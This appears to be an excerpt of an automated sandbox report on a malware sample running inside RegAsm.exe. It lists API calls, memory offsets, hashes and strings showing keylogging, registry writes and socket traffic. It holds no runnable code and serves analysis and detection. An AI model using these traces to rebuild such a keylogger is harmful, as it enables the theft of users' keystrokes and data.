                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 2152742572-0
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                          • _free.LIBCMT ref: 004482D3
                                                          • _free.LIBCMT ref: 004482FA
                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountEventTick
                                                          • String ID: !D@$NG
                                                          • API String ID: 180926312-2721294649
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTimewsprintf
                                                          • String ID: Offline Keylogger Started
                                                          • API String ID: 465354869-4114347211
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                          • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                                                          • RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                          • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 2579639479-0
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3919263394-0
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                          • GetLastError.KERNEL32 ref: 0040D083
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorLastMutex
                                                          • String ID: SG
                                                          • API String ID: 1925916568-3189917014
                                                          APIs
                                                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventObjectSingleWaitsend
                                                          • String ID:
                                                          • API String ID: 3963590051-0
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                          • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                                          • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                                                          • _free.LIBCMT ref: 0044F41A
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnvironmentStrings$Free_free
                                                          • String ID:
                                                          • API String ID: 2716640707-0
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                          • RegCloseKey.KERNEL32(?), ref: 00413592
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                                          • RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                          • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                          • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                          • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                          • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID:
                                                          • API String ID: 1818849710-0
                                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                          • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                          • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                          • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventObjectSingleWaitrecv
                                                          • String ID:
                                                          • API String ID: 311754179-0
                                                          • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                                          • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                                          • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                                          • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: pQG
                                                          • API String ID: 176396367-3769108836
                                                          • Opcode ID: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
                                                          • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                          • Opcode Fuzzy Hash: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
                                                          • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: @
                                                          • API String ID: 1890195054-2766056989
                                                          • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                          • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                          • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                          • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                          APIs
                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEventStartupsocket
                                                          • String ID:
                                                          • API String ID: 1953588214-0
                                                          • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                          • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                          • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                          • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                          • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                          • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                          • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 0041BAB8
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$ForegroundText
                                                          • String ID:
                                                          • API String ID: 29597999-0
                                                          • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                          • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                          • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                          • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                          • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                            • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                            • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                            • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                            • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                            • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                            • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                            • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                            • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                          • String ID:
                                                          • API String ID: 1170566393-0
                                                          • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                          • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                                          • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                          • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                          • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                                                          • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                          • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                                          • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                                          • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                                          • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                          • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                          • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                          • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID:
                                                          • API String ID: 724789610-0
                                                          • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                          • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                          • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                          • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                          APIs
                                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Deallocatestd::_
                                                          • String ID:
                                                          • API String ID: 1323251999-0
                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
